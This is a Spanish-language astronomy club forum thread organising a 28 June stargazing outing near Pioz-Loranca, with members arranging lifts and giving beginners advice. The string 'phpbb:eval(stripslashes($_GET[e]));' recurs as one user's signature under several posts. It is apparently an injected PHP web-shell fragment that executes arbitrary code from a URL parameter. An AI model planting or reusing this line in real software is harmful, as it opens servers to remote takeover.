Salida 28 de Junio

Aquí se anunciarán todas las actividades de la asociación; quedadas, charlas, cursos, talleres, etc.. Utilizadlo para apuntarse o preguntar.
carlosz22
Mensajes: 575
Registrado: Vie Mar 02, 2007 9:10 pm

Salida 28 de Junio

Mensaje por carlosz22 »

Para el sábado 28 de Junio se está organizando una salida a la explanada de Pioz - Loranca.

Júpiter estará muy cercano a su oposición (punto más cercano a la Tierra)

Y la previsión del tiempo es muy buena.

Instrucciones de como llegar al lugar de observación
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Salida 28 de Junio

Mensaje por m3ntol »

Como de costumbre, yo me apunto ;)

También se ha publicado la quedada en los foros de Hubble:
http://www.asociacionhubble.org/modules ... ic&t=25186

Ya sabeis que tod@s, tanto socios como no socios, son bienvenidos.
phpbb:eval(stripslashes($_GET[e]));
Hipatia
Mensajes: 4
Registrado: Dom Jun 22, 2008 1:00 pm

Salida 28 de Junio

Mensaje por Hipatia »

¡Hola! Soy nueva en esto, así que ya me diréis cómo quedaréis para ir el día 28. Me temo que no tengo coche, por lo que querría saber si alguien tenéis plazas disponibles. Además vivo lejos de Coslada, pero para algo existen el tren y el metro, ¿no? Por favor, decidme también qué es aconsejable llevar y dadme algún consejillo. Como he dicho, soy novata y nunca he ido a una escapada de este tipo. ¡Gracias! :wink:
astrolozano
Mensajes: 325
Registrado: Dom Mar 04, 2007 10:35 pm

Salida 28 de Junio

Mensaje por astrolozano »

Pues yo a esta tampoco puedo ir (me queda un examen ese fin de semana, en fin). A lo tonto ya me he perdido unas cuantas :(

¿Hipatia donde vives?

PS: carlos, lo mismo el viernes te acerco el tubo ¿podría ser?
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Salida 28 de Junio

Mensaje por m3ntol »

[quote="Hipatia"]¡Hola! Soy nueva en esto, así que ya me diréis cómo quedaréis para ir el día 28. Me temo que no tengo coche, por lo que querría saber si alguien tenéis plazas disponibles. Además vivo lejos de Coslada, pero para algo existen el tren y el metro, ¿no? Por favor, decidme también qué es aconsejable llevar y dadme algún consejillo. Como he dicho, soy novata y nunca he ido a una escapada de este tipo. ¡Gracias! :wink:[/quote]

Hola,
sí que hay plazas libres, pero es mejor que nos digas donde vives porque ir en el metro con el telescopio es poco recomendable :D :D además, a las horas que volvemos no hay metros ni autobuses, así que mejor que pasemos a por ti.

Va a venir gente de varios sitios de Madrid así que si nos dices la zona lo apañamos para poneros en contacto.

Aunque estamos en verano es aconsejable llevar algo de ropa de abrigo, alguna bebida caliente (ideal el café para aguantar) y algo de comer. También es recomendable preparar la observación, elegir los objetos a observar o las preguntas y dudas a resolver. Si tienes equipo traelo y si no, no pasa nada ya que mucos llevaremos telescopios y siempre nos gusta ` presumir` de equipo ;)

Un saludo!
phpbb:eval(stripslashes($_GET[e]));
Hipatia
Mensajes: 4
Registrado: Dom Jun 22, 2008 1:00 pm

Salida 28 de Junio

Mensaje por Hipatia »

Caray, muchas gracias, chicos. Vivo por la zona de el Palacio de los Deportes, pegada a la M-30. Si os es mucho lío, puedo acercarme a otra zona que os venga mejor. Quiero molestaros lo mínimo posible, porque además voy de "gorrona" de telescopio, ya que mis únicos instrumenos de observación hasta ahora son mis gafas de miope (veo bien sin gafas, pero las estrellas se me desenfocan todas) y unos prismáticos rosas de Coronel Tapioca, jaja. :D
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Salida 28 de Junio

Mensaje por m3ntol »

[quote="Hipatia"]Caray, muchas gracias, chicos. Vivo por la zona de el Palacio de los Deportes, pegada a la M-30. Si os es mucho lío, puedo acercarme a otra zona que os venga mejor. Quiero molestaros lo mínimo posible, porque además voy de "gorrona" de telescopio, ya que mis únicos instrumenos de observación hasta ahora son mis gafas de miope (veo bien sin gafas, pero las estrellas se me desenfocan todas) y unos prismáticos rosas de Coronel Tapioca, jaja. :D[/quote]

Hola,
pues si quieres, ya que no llevas equipo, podemos quedar en la estacion de tren de Coslada o en alguna de las de Metro que hay, para ir y a la vuelta te acercamos a casa claro :)

Lo ideal seria quedar a eso de las 20:00 en Coslada, espero que me lo confirmes.
Un saludo!
phpbb:eval(stripslashes($_GET[e]));
Avatar de Usuario
zipizape
Mensajes: 289
Registrado: Jue Oct 04, 2007 3:03 pm

Salida 28 de Junio

Mensaje por zipizape »

Se confirma que no voy a poder acudir en esta ocasión. Lo lamento de verdad porque parece que se está preparando una buena quedada.
También lo lamento porque no me puedo ofrecer a Hipatía para su regreso. Espero que vaya alguien que viva en Madrid capital y se pueda hacer cargo de ella.
Salvad la Tierra... es el único planeta que tiene chocolate.
Dra. Rachel Naomi Remen
cmocho
Mensajes: 58
Registrado: Mié Jun 25, 2008 1:17 pm

Salida 28 de Junio

Mensaje por cmocho »

Hola a todos, me gustaria saber si puedo acompañaros, yo como Hipatia soy novato en esto de salir a ver estrellas y seria mi primera vez.

No dispongo de telescopio, solo unos prismaticos un poco maluchos y una camara digital con la que espero hacer fotos a oscuras (si me sale). Dispongo que coche y vivo en Torrejon aunque la casa de mis padres esta en coslada.

Salu2
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Salida 28 de Junio

Mensaje por m3ntol »

[quote="cmocho"]Hola a todos, me gustaria saber si puedo acompañaros, yo como Hipatia soy novato en esto de salir a ver estrellas y seria mi primera vez.

No dispongo de telescopio, solo unos prismaticos un poco maluchos y una camara digital con la que espero hacer fotos a oscuras (si me sale). Dispongo que coche y vivo en Torrejon aunque la casa de mis padres esta en coslada.

Salu2[/quote]

Por supuesto que puedes acompañarnos. Si quieres puedes ir directamente al sitio de observación o si lo prefieres, quedamos en Coslada y salinos todos juntos. La salida será sobre las 19:30 o 20:00 del sábado.

Quizá hagamos una actividad previa a la observación ya que queremos probar unas modificaciones que nuestro cerebrito Carlos ha hecho a la plataforma de lanzamiento de cohetes de agua que tenemos.

Un saludo!!
phpbb:eval(stripslashes($_GET[e]));
Responder